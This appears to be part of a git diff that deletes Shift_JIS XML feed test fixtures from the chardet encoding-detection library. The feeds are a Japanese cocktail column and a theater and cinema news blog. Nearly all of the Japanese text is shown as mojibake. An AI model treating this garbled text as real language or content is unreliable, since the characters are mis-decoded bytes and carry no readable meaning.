    @‚‚¸Aמ–{“I‚ֹ¬’°‚ֵ‘ּ“אi‰t’†j‚ֹ“‚ֱ‚½‚¨נ‚ֽװ‚×o‚¿‘ּ‚ּ’†‚ֵ•׉נ‚³‚ך‚י‚‚ֱֵ‚¦‚‚¹‚סB‚»‚ּ’¼‘O‚ֹ‚ ‚יiˆ‚ֶH“¹j‚¨נ‚ֽ‘S•”ז‚ט‚¢‚ִ‚ ‚°‚‚µ‚ו‚₪B“ן‚µ‚¢‚ז‚₪‚ֵ‚ ‚ך‚־Aˆך“x…‚נˆש‚‚¹‚י‚±‚ֶ‚ֵ“f‚«‚ג‚·‚­‚ָ‚ט‚‚·Bˆךl‚ֹ‚ז‚ט‚‚·‚×A‚±‚ך‚ֵ’¼‘O‚ּ‚R‚O•ׂ®‚ח‚¢‚ּƒAƒ‹ƒR[ƒ‹‚בּ“א‚ֹ’ַ‰ֱ‚ֵ‹z‚³‚ך‚י‚±‚ֶ‚נ–h‚¬‚‚·B

    - -

    @‘±‚¢‚ִAƒAƒ‹ƒR[ƒ‹‚נ‘ו—ז‚·‚י‚ֶ’E…ַף‚נ‚¨‚±‚µ‚‚·‚ּ‚ֵA…•וג‹‹‚נs‚¢‚‚·BƒXƒ|[ƒcƒhƒƒ“ƒN‚ׂ¢‚¢‚ֵ‚·‚×A‚ָ‚¢‚ָ‚ח•’‚ּ…‚ג‚¨’ƒ‚ֵ\•ֵׂ‚·B

    - -

    @‚±‚±‚‚ֵ‘‚¢‚ִv‚¢‚‚µ‚½‚×A“–‘RA’@‚¢‚ִ‚אִ‚ׁ‚©‚¯‚ִ‚א”½‰ƒiƒV‚ּך‡‚ֽ‹~‹}װ‚ֵ‚·‚זI•K‚¸ִ‚ס‚ֵ‚­‚¾‚³‚¢‚ֻB”½‰‚×”–‚¢ך‡‚א–{“–‚ֽ•a‰@s‚ֱ‚½‚‚₪‚ׂ¢‚¢‚ּ‚ֵ‚·‚×A‚ָ‚©‚ָ‚©“ן‚µ‚¢‚ֶv‚₪‚ּ‚ֵ‚»‚ּ‚ּ‘־ˆ–@‚ֵ‚·B

    - -

    E“f‚¢‚ִ’‚‘§‚µ‚ָ‚¢‚ז‚₪‚ֹ‰¡‚«‚ֹQ‚©‚¹‚יyd—vz•K—v‚ָ‚חAח‚ּ‰÷‚ֹƒSƒ~‘‚ֵ‚אBB
    -Eƒxƒ‹ƒg‚ֹֽ‚‚יBƒ^ƒCƒg‚ָ•‚ָ‚ח’…‘ײ‚¦‚³‚¹‚ִ‚ ‚°‚יB
    -E–ׁ•z‚ָ‚ַ‚נ‚©‚¯‚ִ‚ ‚°‚יBi“~‚ּ–לO‚ֶ‚©‚¾‚ֶmְ‚ֹ€‚ֹ‚‚·j
    -E’N‚©‚ֲׂ‚«‚»‚₪B

    - -

    ymemoz
    -E‚ַ‚₪‚µ‚ִ‚א“f‚¯‚ָ‚¢‚ֶ‚«‚ֽA‚¨‚ָ‚©i¬’°`ˆj‚נhƒ‚·‚י‚ֶ—ַ‚¢‚ֵ‚·B

    ]]> - -
    -
    - -ƒJƒNƒeƒ‹‚נל‚יiƒƒWƒƒ[ƒJƒbƒvj - -2005-04-17T20:44:08Z -2004-11-20T09:08:20Z -tag:www.milliontimes.jp,2004:/column//2.48 -2004-11-20T09:08:20Z -@ƒJƒNƒeƒ‹‚נל‚י‚ֶ‚«‚ֹ’m‚ח‚ָ‚¢‚ֶ‚¢‚¯‚ָ‚¢‚ּ‚׃ƒVƒsB‚»‚ּƒƒVƒs’‚ט‚ּ•×—‚ֹ‚·‚י‚½‚‚ֹ•K—v‚ָ‚ּ‚׃ƒWƒƒ[ƒJƒbƒv‚ֵ‚·BƒƒLƒ…[ƒ‹‚גƒXƒsƒƒbƒc‚ּ•×—‚נ—‚י‚½‚‚ּ“¹‹ן‚ֵ‚·B‚±‚ּ‚±‚ֶ‚נƒƒWƒƒ[‚נ״‚י‚ֶ‚¢‚ֱ‚½‚ט‚µ‚‚·B @—ב‚¦‚־A‚wD‚xD‚yD¦‚נ60m... - -takato -http://www.milliontimes.jp/ -info@milliontimes.jp - -220make - -@ƒJƒNƒeƒ‹‚נל‚י‚ֶ‚«‚ֹ’m‚ח‚ָ‚¢‚ֶ‚¢‚¯‚ָ‚¢‚ּ‚׃ƒVƒsB‚»‚ּƒƒVƒs’‚ט‚ּ•×—‚ֹ‚·‚י‚½‚‚ֹ•K—v‚ָ‚ּ‚׃ƒWƒƒ[ƒJƒbƒv‚ֵ‚·BƒƒLƒ…[ƒ‹‚גƒXƒsƒƒbƒc‚ּ•×—‚נ—‚י‚½‚‚ּ“¹‹ן‚ֵ‚·B‚±‚ּ‚±‚ֶ‚נƒƒWƒƒ[‚נ״‚י‚ֶ‚¢‚ֱ‚½‚ט‚µ‚‚·B

    - -

    @—ב‚¦‚־A‚wD‚xD‚yD¦‚נ60mlל‚י‚ֶ‚«‚ֹ‚ֽA30ml‚ּƒƒWƒƒ[ƒJƒbƒv‚נg‚ֱ‚ִA‚‚¸ƒ‰ƒCƒgƒ‰ƒ€‚נ30mli–ƒ^ƒ“F•\–’£—ֽ‚ֵ·‚טד‚ׂי‚‚ֵj’‚¬AƒVƒFƒCƒJ[‚ֹˆ‚µ‚‚·B‚ֹ“¯‚¶30ml‚ּƒJƒbƒv”¼•ּׂƒzƒƒCƒgƒLƒ…ƒ‰ƒ\[‚נ‚¢‚ךƒVƒFƒCƒJ[‚ֹˆ‚µ‚‚·Bֵד‚ֹ“¯‚¶‚ז‚₪‚ֹƒƒ‚ƒ“ƒWƒ…[ƒX15ml‚נv‚ֱ‚ִAI—¹‚ֶ‚ָ‚ט‚‚·B15ml—‚ך‚יƒƒWƒƒ[ƒJƒbƒv‚א‚ ‚ט‚‚·‚×A’ם‚ֽ1ם—‚ּƒƒWƒƒ[ƒJƒbƒv‚נg‚¢‚‚·B‚»‚ּ‚‚₪‚×A‘‚¢‚µ‚©‚ֱ‚±‚ז‚¢‚©‚ח‚ֵ‚·B
    -ƒVƒFƒCƒJ[@µ‚ך‚ָ‚¢‚₪‚¿‚ֽA30ml‚ּƒƒWƒƒ[ƒJƒbƒv‚ֵ15ml‚נ—‚י‚ּ‚ֽ“ן‚µ‚¢‚©‚א‚µ‚ך‚‚¹‚ס‚×A¶‚ּ}‚ּ‚ז‚₪‚ֹ‘ו‘ּ7•×–‚®‚ח‚¢‚‚ֵ“‚ך‚י‚ֶA‚¿‚ו‚₪‚ַ15ml—‚ך‚‚·B–{i“I‚ֹ‚µ‚½‚¢l‚ֽ15ml‚נ3‰ס—‚טA‚»‚ך‚×–{“–‚ֹ45ml‚ֹ‚ָ‚ֱ‚ִ‚¢‚י‚©‚ּ—K‚נ‚·‚י‚ֶ—ַ‚¢‚ֵ‚µ‚ו‚₪Bµ‚ך‚ִ‚­‚ך‚־A10ml‚ג20ml‚א—‚ך‚י‚ז‚₪‚ֹ‚ָ‚ט‚‚·B

    - -

    @‚µ‚©‚µ‚ָ‚ׂח‚±‚ּ‚ז‚₪‚ֹ‚«‚ֱ‚¿‚ט‚ֶ—‚ֱ‚ִƒVƒFƒCƒN‚µ‚ִ‚אְ‚ֹ‚ֽ•X‚×—n‚¯‚ִ70ml‚®‚ח‚¢‚ֹ‘‚¦‚ִ‚µ‚‚¢‚‚·B

    - -


    ¦‚wD‚xD‚yDiƒGƒbƒNƒXEƒƒCEƒW[j‚ּƒƒVƒs‚ֽƒ‰ƒCƒgƒ‰ƒ€1/2AƒzƒƒCƒgƒLƒ…ƒ‰ƒ\[1/4Aƒƒ‚ƒ“ƒWƒ…[ƒX1/4‚ֵ‚·B‚±‚ּך‡‚ֽ‚»‚ך‚¼‚ך30mlA15mlA15ml‚ֶ‚ָ‚י

    - -

    @g‚¢•‚ָֽ’P‚ֵ‚·B‚ֵ‚אA‚«‚¿‚ס‚ֶ…•½‚ֹ‚µ‚ָ‚¢‚ֶ³m‚ֹ—‚ך‚‚¹‚סB
    -Eg‚₪w‚ֽ—˜‚«˜r‚ֵ‚ָ‚¢ew‚ֶ¬w‚נ‚¢‚½’†‚R–{‚ֵ‚·B
    -El·‚µwiט‘OjE’†wi‰jE–עwiט‘Oj‚ֵƒƒWƒƒ[ƒJƒbƒv‚נ‚­‚ׁ‚ך‚ּ‚ֶ‚±‚כ‚ֵ‚ֽ‚³‚‚‚·B
    -Eew‚ֶl·‚µw‚ֵ‚ ‚¯‚½ƒ{ƒgƒ‹‚ּƒLƒƒƒbƒv‚נ‚ֲ‚±‚ֶ‚א‚ ‚ט‚‚·B
    -E—˜‚«˜r‚ֵƒ{ƒgƒ‹‚©‚חƒƒWƒƒ[ƒJƒbƒv‚ֹ’‚¬AƒVƒFƒCƒJ[“™‚ֹ“‚ך‚י‚ֶ‚«‚ֽA‰‚ֹiט‚ּ‚׀‚ח‚נד‚ֹ‚·‚י‚ז‚₪‚ֹjט‚נ•װ‚µ‚‚·B

    ]]> -ƒƒWƒƒ[ƒJƒbƒv@ƒƒWƒƒ[ƒJƒbƒv‚ֹ‚א‚Rם—‚ּ‘ו‚«‚³‚ׂ ‚ט‚‚·B‚»‚ך‚¼‚ך‚ֹ‚Qם—‚ּ—e—ƒJƒbƒv‚ֲׂ‚¢‚ִ‚¢‚‚·‚ּ‚ֵA—p“r‚ֹ‚ז‚ֱ‚ִg‚¢•ׂ¯‚½‚ט‚µ‚ִ‚¢‚‚·B
    -‘וm50/30mln
    E’†m45/30mlnE¬m30/15mln‚ֵ•’‚ֵ‚ ‚ך‚־A’†‚נ”ƒ‚ֱ‚ִ‚¨‚¯‚־–ג‘ט‚ָ‚¢‚ֵ‚µ‚ו‚₪B

    - -


    @ƒƒ“ƒN‚ֽ‚·‚׳‚ִ‚±‚¾‚ם‚טƒLƒbƒ`ƒ“@ƒvƒ‚ּ“¹‹ן‰®‚³‚ס‚ֹ”ע‚ׁ‚‚·B‰Sׂ—pƒJƒNƒeƒ‹ƒZƒbƒg“™‚א‚ ‚ט‚‚·B–l‚א‚¢‚ֲ‚א‚±‚±‚ֵw“‚µ‚ִ‚¢‚‚·B•ײ—˜‚ֵ‚·‚זB

    ]]> -
    -
    - -ƒJƒNƒeƒ‹‚נל‚יiƒVƒFƒCƒJ[j - -2005-04-17T20:43:54Z -2004-11-14T14:21:03Z -tag:www.milliontimes.jp,2004:/column//2.47 -2004-11-14T14:21:03Z -©‘מ‚ֵƒJƒNƒeƒ‹‚נל‚כ‚₪‚ֶv‚ֱ‚½‚ֶ‚«Aˆך”װ‚ֹv‚¢•‚‚©‚װ‚ּ‚ׂ±‚ךAƒVƒFƒCƒJ[‚ֵ‚·‚ז‚ֻB‚»‚א‚»‚אshake‚ֹ‚ֽhU‚ך‚יh‚ֶ‚©hU“®‚·‚יh‚ֶ‚¢‚₪ˆ׃–¡‚ׂ ‚ט‚‚·BƒVƒFƒCƒJ[‚ּ’†‚ֵ‚¨נ‚נ”ם—¬‚÷‡‚ם‚¹‚י‚½‚‚ּ“¹‹ן‚ֹ‚ָ‚ט‚‚·B–“I‚ֽ‚R‚ֲ‚ ‚ט‚‚·B E‚¨... - -takato -http://www.milliontimes.jp/ -info@milliontimes.jp - -220make - -©‘מ‚ֵƒJƒNƒeƒ‹‚נל‚כ‚₪‚ֶv‚ֱ‚½‚ֶ‚«Aˆך”װ‚ֹv‚¢•‚‚©‚װ‚ּ‚ׂ±‚ךAƒVƒFƒCƒJ[‚ֵ‚·‚ז‚ֻB‚»‚א‚»‚אshake‚ֹ‚ֽhU‚ך‚יh‚ֶ‚©hU“®‚·‚יh‚ֶ‚¢‚₪ˆ׃–¡‚ׂ ‚ט‚‚·BƒVƒFƒCƒJ[‚ּ’†‚ֵ‚¨נ‚נ”ם—¬‚÷‡‚ם‚¹‚י‚½‚‚ּ“¹‹ן‚ֹ‚ָ‚ט‚‚·B–“I‚ֽ‚R‚ֲ‚ ‚ט‚‚·B
    -E‚¨נ“¯m‚נ¬‚÷‚י
    -E‚¨נ‚ּ’†‚ֹ‹ף‹C‚נ“‚ך‚י‚±‚ֶ‚ֵ‚¨נ‚ּ–¡‚נ‚‚כ‚ג‚©‚ֹ•ֿ‚¦‚י
    -E•X‚נ’†‚ֹ“‚ך‚י‚±‚ֶ‚ֵA‚¨נ‚נ‹}ƒ‚ֹ—ג‚ג‚·

    - -

    ƒVƒFƒCƒJ[‚ֽ‚R‚ֲ‚ֹ•׉נ‚³‚ך‚‚·‚×A‚¨נ‚ג•X‚נ‚¢‚ך‚יˆך”װ‘ו‚«‚ָ•”•ׂנhƒ{ƒfƒBhA‚¨נ‚נ‚»‚»‚®‚ֶ‚«‚ֹ•X‚×o‚ָ‚¢‚ז‚₪‚ֹ¬‚³‚ָ‚ּ‚ ‚¢‚ִ‚¢‚י’†W‚נhƒXƒgƒƒCƒi[hAƒLƒƒƒbƒv‚נhƒgƒbƒvh‚ִֶ‚ׁ‚‚·B

    ]]> -ƒXƒ^ƒ“ƒ_[ƒhƒJƒNƒeƒ‹ƒVƒF[ƒJ[ -ƒVƒFƒCƒJ[‚ּ‘I‚ׁ•‚ֵ‚·‚×AƒXƒ^ƒ“ƒ_[ƒh‚ּ‚א‚ּ‚ֵ‘ו(530cc)m‘ו‚«‚ָƒJƒNƒeƒ‹ƒOƒ‰ƒXi90`120ccj‚Q`‚R”t•×nE’†(350cc)m‘ו‚«‚ָƒJƒNƒeƒ‹ƒOƒ‰ƒXi90`120ccj‚P”t•×nE¬(250cc)m¬‚³‚ָƒJƒNƒeƒ‹ƒOƒ‰ƒX(60cc)1”t•×n‚ׂ ‚ט‚‚·B‚‚¸‚ֽA’†ƒTƒCƒY‚נw“‚µ‚ִ‚¨‚¯‚־–ג‘ט‚ָ‚¢‚ֵ‚µ‚ו‚₪BƒTƒCƒY‚א‚¿‚ו‚₪‚ַט‚ֹƒtƒBƒbƒg‚µ‚ִˆך”װg‚¢‚ג‚·‚¢‚ֶv‚¢‚‚·B1500`2500‰~‚®‚ח‚¢‚ֵ‚·B
    -ƒƒ“ƒN‚ֽ‚·‚׳‚ִ‚±‚¾‚ם‚טƒLƒbƒ`ƒ“@ƒvƒ‚ּ“¹‹ן‰®‚³‚ס‚ֹ”ע‚ׁ‚‚·‰Sׂ—pƒJƒNƒeƒ‹ƒZƒbƒg“™‚א‚ ‚ט‚‚·B–l‚א‚¢‚ֲ‚א‚±‚±‚ֵw“‚µ‚ִ‚¢‚‚·B•ײ—˜‚ֵ‚·‚זB]]> -
    -
    - -–U‚יƒAƒ‹ƒR[ƒ‹ - -2005-04-17T21:46:01Z -2004-09-29T06:59:33Z -tag:www.milliontimes.jp,2004:/column//2.46 -2004-09-29T06:59:33Z -@¡‰ס‚ֽ”S‚ָ˜bBƒAƒ‹ƒR[ƒ‹¨‚¨|‚ּƒRƒ‰ƒ€‚ֵ‚א׀‰מ‚µ‚½‚ז‚₪‚ֹlװ‚׈ש‚ס‚ֵ‚א‘וה•v‚ָ‚ּ‚ֽƒGƒ^ƒm[ƒ‹iƒGƒ`ƒ‹ƒAƒ‹ƒR[ƒ‹j‚ֵƒƒ^ƒm[ƒ‹‚נˆש‚‚ֶ¸–¾‚µ‚ִ‚µ‚‚¢‚‚·Bםדװ‚א‚ָ‚¢“ת–{‚ג»‚ֵ‚א”­“W“rד‘‚ֵ‚¨נ‚ֹƒƒ`ƒ‹ƒAƒ‹ƒR[ƒ‹‚ד‚ֱ‚ִ‚¢‚½‚ֶ‚¢‚₪–‚ֽ... - -takato -http://www.milliontimes.jp/ -info@milliontimes.jp - -900other - -@¡‰ס‚ֽ”S‚ָ˜bBƒAƒ‹ƒR[ƒ‹¨‚¨|‚ּƒRƒ‰ƒ€‚ֵ‚א׀‰מ‚µ‚½‚ז‚₪‚ֹlװ‚׈ש‚ס‚ֵ‚א‘וה•v‚ָ‚ּ‚ֽƒGƒ^ƒm[ƒ‹iƒGƒ`ƒ‹ƒAƒ‹ƒR[ƒ‹j‚ֵƒƒ^ƒm[ƒ‹‚נˆש‚‚ֶ¸–¾‚µ‚ִ‚µ‚‚¢‚‚·Bםדװ‚א‚ָ‚¢“ת–{‚ג»‚ֵ‚א”­“W“rד‘‚ֵ‚¨נ‚ֹƒƒ`ƒ‹ƒAƒ‹ƒR[ƒ‹‚ד‚ֱ‚ִ‚¢‚½‚ֶ‚¢‚₪–‚ֽ•·‚«‚‚·Bְ‚ֹˆש‚ס‚¾‚±‚ֶ‚ּ‚ ‚יl‚©‚ח•·‚¢‚½˜b‚ֹ‚ז‚י‚ֶA“¯‚¶—‚ֵ‚אƒƒ`ƒ‹ƒAƒ‹ƒR[ƒ‹‚ּ‚‚₪‚׋­—ף‚ֹ‚¢‚׉ס‚י‚»‚₪‚ֵ‚·BF‚³‚סA^—‚µ‚ָ‚¢‚ז‚₪‚ֹB‚¿‚ָ‚‚ֹAƒƒ`ƒ‹ƒAƒ‹ƒR[ƒ‹‚ב‰»w–½–¼–@‚ִּ‚ׁ–¼‚ֵAƒƒ^ƒm[ƒ‹‚ֽµ—p–¼‚ֵ‚·B

    ]]> - -
    -
    - -‰־נ - -2005-04-17T20:42:46Z -2004-09-29T06:59:30Z -tag:www.milliontimes.jp,2004:/column//2.45 -2004-09-29T06:59:30Z -@ƒr[ƒ‹‚נ¿‚ֵ‘‚­‚ֶ”נAƒƒCƒ“‚ֽ‚װ‚ַ‚₪נ‚ֵ•’“¸נB‚»‚ך‚ֵ‚ֽA‰־נ‚ֱ‚ִ‚¢‚ֱ‚½‚¢‚ָ‚ס‚ֵ‚µ‚ו‚₪Bְ‚ֽ‚±‚ךƒuƒ‰ƒ“ƒf[‚ּ‚±‚ֶ‚ָ‚ס‚ֵ‚·B“x”‚׋­‚¢‚ּ‚ֵ‚ֹ“‚ך‚½‚ֶ‚«‚ּ´o‚נu‰־v‚ֶ•\»‚µ‚½‚ס‚ֵ‚·‚©‚ֻH‚ָ‚ס‚ֶ‚©AƒJƒNƒeƒ‹¬‡נ‚גƒ‰ƒ€“נiƒ‰ƒ€‚ּ´... - -takato -http://www.milliontimes.jp/ -info@milliontimes.jp - -230name - -@ƒr[ƒ‹‚נ¿‚ֵ‘‚­‚ֶ”נAƒƒCƒ“‚ֽ‚װ‚ַ‚₪נ‚ֵ•’“¸נB‚»‚ך‚ֵ‚ֽA‰־נ‚ֱ‚ִ‚¢‚ֱ‚½‚¢‚ָ‚ס‚ֵ‚µ‚ו‚₪Bְ‚ֽ‚±‚ךƒuƒ‰ƒ“ƒf[‚ּ‚±‚ֶ‚ָ‚ס‚ֵ‚·B“x”‚׋­‚¢‚ּ‚ֵ‚ֹ“‚ך‚½‚ֶ‚«‚ּ´o‚נu‰־v‚ֶ•\»‚µ‚½‚ס‚ֵ‚·‚©‚ֻH‚ָ‚ס‚ֶ‚©AƒJƒNƒeƒ‹¬‡נ‚גƒ‰ƒ€“נiƒ‰ƒ€‚ּ´—¿‚ֽƒTƒgƒEƒLƒrj‚ ‚½‚ט‚‚ֵ‚ֽ‚ם‚©‚י‚ֶ‚µ‚ִ‚אAO•נƒVƒƒƒ“ƒpƒ“i“ַ‚•‚©‚ח‚©HjA—mנƒWƒ“i—mנ‚ֽƒWƒ“‚¾‚¯‚ֵ‚ֽ‚ָ‚¢‚ס‚¾‚¯‚ַEEjA¬נƒƒLƒ…[ƒ‹iHHj‚‚ֵ‚­‚י‚ֶA‘½­–³—‚ׂ ‚י‚ז‚₪‚ָ‹C‚ׂµ‚‚·B‘¼‚ֹ‚א“–‚ִ’m‚ֱ‚ִ‚½‚חƒ[ƒ‹‚ֵ‹³‚¦‚ִ‚­‚¾‚³‚¢B

    - -

    y’ַ‰ֱzד‚ּƒRƒ‰ƒ€‚נ‘‚¢‚ִ‚¢‚ִv‚¢o‚µ‚‚µ‚½Bנ¸ƒAƒ‹ƒR[ƒ‹‚ֵ‚·B

    -yw“EzƒJƒNƒeƒ‹~ƒJƒNƒeƒ‹‚ּKUMA‚³‚ס‚ֹ‰־נ‚ֽAƒEƒIƒbƒJ‚נw‚·‚ּ‚ֵ‚ֽ‚ָ‚¢‚©‚ֶ‚¢‚₪‚²w“E‚ׂ ‚ט‚‚µ‚½‚ּ‚ֵA»’²¸’†‚ֵ‚·B‚²w“E‚ ‚ט‚ֶׂ‚₪B_(._.)_

    -y‹˜_z‰־נ‚ֹ‚ֲ‚¢‚ִ‚ֽ‚¢‚כ‚¢‚כ’²‚׳‚½‹‰Ahצ—¯נh‚ֶ“¯‹`‚ֵ‚ ‚י‚±‚ֶ‚ׂם‚©‚ט‚‚µ‚½B‚¨נ‚נצ—¯‚·‚י‚ֶ‚«‚ֹ‚ֽA•K‚¸‰־‚נ“‚ך‚י‚±‚ֶ‚©‚ח‚»‚ּ–¼‘O‚ֲׂ‚¢‚½‚ז‚₪‚ֵ‚·B

    ]]> - -
    -
    - -
    \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/moon-light.ne.jp.xml b/chardet/tests/SHIFT_JIS/moon-light.ne.jp.xml deleted file mode 100644 index b6a9fd2..0000000 --- a/chardet/tests/SHIFT_JIS/moon-light.ne.jp.xml +++ /dev/null @@ -1,152 +0,0 @@ - - - - -‰‰€ƒjƒ…[ƒX | ƒVƒAƒ^[ƒƒrƒ…[ -http://www.moon-light.ne.jp/weblog/ -ƒVƒAƒ^[ƒ[ƒOַ—lFKantaro‚ּweblog‚ֵ‚·B -‰‰€Eƒ~ƒ…[ƒWƒJƒ‹E‰f‰זEƒhƒ‰ƒ}‚ָ‚ַ‚ּƒjƒ…[ƒX‚ג´‘z‚נ‘‚¢‚ִ‚¢‚‚·B -ja -Copyright 2006 -Mon, 02 Jan 2006 19:05:13 +0900 -http://www.movabletype.org/?v=3.17-ja -http://blogs.law.harvard.edu/tech/rss - - -2005”N‘וA“ת‹’®—¦ -‘וA“ת‚ּƒeƒƒr‹’®—¦‚׃rƒfƒIƒƒT[ƒ`‚©‚ח”­•\Ag”’‚ּ‹’®—¦‚ֽ1•”35.4“A2•”42.9“‚ֵ‚µ‚½B

    ]]>
    -http://www.moon-light.ne.jp/weblog/archives/2006/01/2005_2.html -http://www.moon-light.ne.jp/weblog/archives/2006/01/2005_2.html -Rating -Mon, 02 Jan 2006 19:05:13 +0900 -
    - -‘ז47‰ס–ˆ“ת|p‚ָ‚ַ -‘ז47‰ס–ˆ“ת|pA2005”N“x’©“תA‘ז47‰ס“ת–{ƒƒR[ƒh‘ו‚×”­•\‚³‚ך‚‚µ‚½B

    ]]>
    -http://www.moon-light.ne.jp/weblog/archives/2006/01/47_1.html -http://www.moon-light.ne.jp/weblog/archives/2006/01/47_1.html -Prize -Sun, 01 Jan 2006 18:48:13 +0900 -
    - -‚ ‚¯‚‚µ‚ִ‚¨‚‚ֵ‚ֶ‚₪‚²‚´‚¢‚‚· -¡”N‚אƒVƒAƒ^[ƒ[ƒO‹₪X‚ז‚כ‚µ‚­‚¨ט‚¢‚µ‚‚·B

    ]]>
    -http://www.moon-light.ne.jp/weblog/archives/2006/01/post_139.html -http://www.moon-light.ne.jp/weblog/archives/2006/01/post_139.html -Site-Information -Sun, 01 Jan 2006 04:34:11 +0900 -
    - -‰f‰זƒ`ƒPƒbƒgמ•ס -‰f‰ז‚ּ‘O”„‚ט„ˆרƒ`ƒPƒbƒgמ•ס‚ֵ‚·B

    ]]>
    -http://www.moon-light.ne.jp/weblog/archives/2005/12/post_138.html -http://www.moon-light.ne.jp/weblog/archives/2005/12/post_138.html -Cinema-Ticket -Sat, 31 Dec 2005 15:53:36 +0900 -
    - -‰‰€ƒ`ƒPƒbƒgמ•ס -12/29`1/4”­”„‚ּ‰‰€Eƒ~ƒ…[ƒWƒJƒ‹‚ּƒ`ƒPƒbƒgמ•ס‚ֵ‚·B

    ]]>
    -http://www.moon-light.ne.jp/weblog/archives/2005/12/post_137.html -http://www.moon-light.ne.jp/weblog/archives/2005/12/post_137.html -Ticket -Thu, 29 Dec 2005 17:52:14 +0900 -
    - -ƒXƒJƒp[IBB -1”N’צ‘O‚ֹƒƒjƒ…[ƒAƒ‹ƒI[ƒvƒ“‚µ‚½ƒIƒ“ƒ‰ƒCƒ““®‰ז”zMƒTƒCƒguƒXƒJƒp[I‚a‚av
    -‰‰€Eƒ~ƒ…[ƒWƒJƒ‹ײ˜A‚ּƒRƒ“ƒeƒ“ƒc‚ׂ ‚ט‚‚·B

    ]]>
    -http://www.moon-light.ne.jp/weblog/archives/2005/12/bb.html -http://www.moon-light.ne.jp/weblog/archives/2005/12/bb.html -Internet -Wed, 28 Dec 2005 15:45:44 +0900 -
    - -wowowu12l‚ּ—D‚µ‚¢“ת–{lv¶’†p -»ד‰‰’†‚ּu12l‚ּ—D‚µ‚¢“ת–{lv
    -1/28צ‰‰‚ּ–ֽ—l‚נAwowow‚×¶’†p‚µ‚‚·B
    -

    ]]>
    -http://www.moon-light.ne.jp/weblog/archives/2005/12/wowow12.html -http://www.moon-light.ne.jp/weblog/archives/2005/12/wowow12.html -Performance|News -Tue, 27 Dec 2005 17:54:43 +0900 -
    - -‘ו’n^‰›‚×uƒiƒ‹ƒjƒA‘•¨ךv‚ֵ÷—D -‘ו’n^‰›‚׃fƒBƒYƒj[‰f‰זuƒiƒ‹ƒjƒA‘•¨ך/‘ז1ֽFƒ‰ƒCƒIƒ“‚ֶ–‚—v
    -“ת–{ך‚«‘ײ‚¦”ֵ‚ֵA÷—D‚ֹ‰’§ם‚·‚י‚±‚ֶ‚ׂם‚©‚ט‚‚µ‚½B
    -

    ]]>
    -http://www.moon-light.ne.jp/weblog/archives/2005/12/post_136.html -http://www.moon-light.ne.jp/weblog/archives/2005/12/post_136.html -Cinema -Mon, 26 Dec 2005 16:40:26 +0900 -
    - -ƒVƒ“ƒfƒBEƒ[ƒp[‚׃uƒ[ƒhƒEƒFƒCƒfƒrƒ…[ -ƒAƒƒƒJ‚ּ‰ּטCyndi Lauper‚×
    -—ˆ”Nƒ~ƒ…[ƒWƒJƒ‹uO•¶ƒIƒyƒ‰v‚ֵƒuƒ[ƒhƒEƒFƒCƒfƒrƒ…[‚·‚י‚±‚ֶ‚׈‚‚ט‚‚µ‚½B

    ]]>
    -http://www.moon-light.ne.jp/weblog/archives/2005/12/post_135.html -http://www.moon-light.ne.jp/weblog/archives/2005/12/post_135.html -Musical -Sun, 25 Dec 2005 21:44:19 +0900 -
    - -‘ז29‰ס“ת–{ƒAƒJƒfƒ~[—DG -21“תA‘ז29‰ס“ת–{ƒAƒJƒfƒ~[‚ּ—DG‚×”­•\‚³‚ך‚‚µ‚½B

    ]]>
    -http://www.moon-light.ne.jp/weblog/archives/2005/12/29.html -http://www.moon-light.ne.jp/weblog/archives/2005/12/29.html -Cinema-award -Fri, 23 Dec 2005 01:57:55 +0900 -
    - -‰‰€ƒ`ƒPƒbƒgמ•ס -12/22`12/28”­”„‚ּ‰‰€Eƒ~ƒ…[ƒWƒJƒ‹‚ּƒ`ƒPƒbƒgמ•ס‚ֵ‚·B
    -

    ]]>
    -http://www.moon-light.ne.jp/weblog/archives/2005/12/post_134.html -http://www.moon-light.ne.jp/weblog/archives/2005/12/post_134.html -Ticket -Thu, 22 Dec 2005 21:42:05 +0900 -
    - -˜a‰›‚ז‚₪‚©–ּ -ƒVƒAƒ^[Eƒhƒ‰ƒ}ƒVƒeƒB‚ֵ•ף’ֻ’ˆ‘guW-WING-vד‰‰’†A
    -˜a‰›‚ז‚₪‚©‚׉‚ֱ‚ִ•‘‘הד‚ֹ“]—Aצ‰‰‚ֽ’†~‚ֶ‚ָ‚ט‚‚µ‚½B

    ]]>
    -http://www.moon-light.ne.jp/weblog/archives/2005/12/post_133.html -http://www.moon-light.ne.jp/weblog/archives/2005/12/post_133.html -Takarazuka -Thu, 22 Dec 2005 02:48:37 +0900 -
    - -•ף’ֻתƒgƒbƒvƒXƒ^[‚׈’ט -•ף’ֻ‰ּ€’c‚ֽAת’ˆ‘gו‰‰’j–נ‚ֹ‹Mי‚¯‚¢Aו‰‰–÷–נ‚ֹ‡י‚י‚¢
    -‰װ‘gו‰‰–÷–נ‚ֹק”T‰¹‚דא’ט‚µ‚½‚ֶ”­•\‚µ‚‚µ‚½B

    ]]>
    -http://www.moon-light.ne.jp/weblog/archives/2005/12/post_132.html -http://www.moon-light.ne.jp/weblog/archives/2005/12/post_132.html -Takarazuka -Wed, 21 Dec 2005 16:50:23 +0900 -
    - -TV Bank -ƒ\ƒtƒgƒoƒ“ƒN‚ֶƒ„ƒt[‚ֽנ“תA“®‰ז”zM‚ּV‰ן׀uTVƒoƒ“ƒNv‚נ‹₪“¯‚ֵ—§B
    -Yahoo!“®‰ז‚ֵ”װ‘g‚ּ”zM‚נJn‚µ‚‚µ‚½B

    ]]>
    -http://www.moon-light.ne.jp/weblog/archives/2005/12/tv_bank.html -http://www.moon-light.ne.jp/weblog/archives/2005/12/tv_bank.html -Internet -Tue, 20 Dec 2005 14:55:04 +0900 -
    - -DVD”Nװƒ‰ƒ“ƒLƒ“ƒO -ƒIƒƒRƒ“‚×2005”NƒIƒƒRƒ“”Nװƒ‰ƒ“ƒLƒ“ƒO‚נ”­•\B
    -‚»‚ּ‘¼‰f‰זEDVD‚ֹײ‚·‚י”Nװƒ‰ƒ“ƒLƒ“ƒO‚נW‚‚ִ‚‚‚µ‚½B

    ]]>
    -http://www.moon-light.ne.jp/weblog/archives/2005/12/dvd_1.html -http://www.moon-light.ne.jp/weblog/archives/2005/12/dvd_1.html -DVD|News -Mon, 19 Dec 2005 18:46:34 +0900 -
    - - -
    -
